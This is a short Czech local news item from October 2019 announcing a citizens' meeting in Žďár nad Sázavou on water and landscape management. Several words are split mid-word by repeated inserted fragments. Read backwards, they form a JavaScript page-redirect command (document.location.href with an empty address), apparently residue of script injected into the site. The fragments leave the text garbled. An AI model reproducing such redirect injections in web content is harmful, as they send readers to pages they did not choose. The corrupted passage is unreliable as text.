Rainbow page separator

Říjnové setkání s občany se bude týkat vody a hospodaření s ní

Neděle, 13. října 2019

Žďár nad Sázavou / Voda z pohledu krajinářské architektury je název dalšího setkání vedení žďárské radnice s občany. To se uskuteční ve středu 16. října od 18 hodin v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách dětského oddělení žďárské Knihovny Matěje Josefa Sychry na Havlíčkově náměstí.
Při debatě přijde řeč na vodu v krajině, principy takzvané zelenomodré infrastruktury ve městech, hospodaření s dešťovou vodou, čis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totu vodních zdrojů a podobnou problematiku. Účastníci akce pro veřejnost budou seznámeni s příklady dobré praxe krajinářských řešení, které nabízejí různé možnosti, jak si v rámci udržitelnosti poradit se soudobými problémy [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to charakteru, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak ve městě, tak i v krajině. Diskuse s obyvateli města se zúčastní jak vedeni Žďáru, tak i městská krajinářka Lucie Radilová.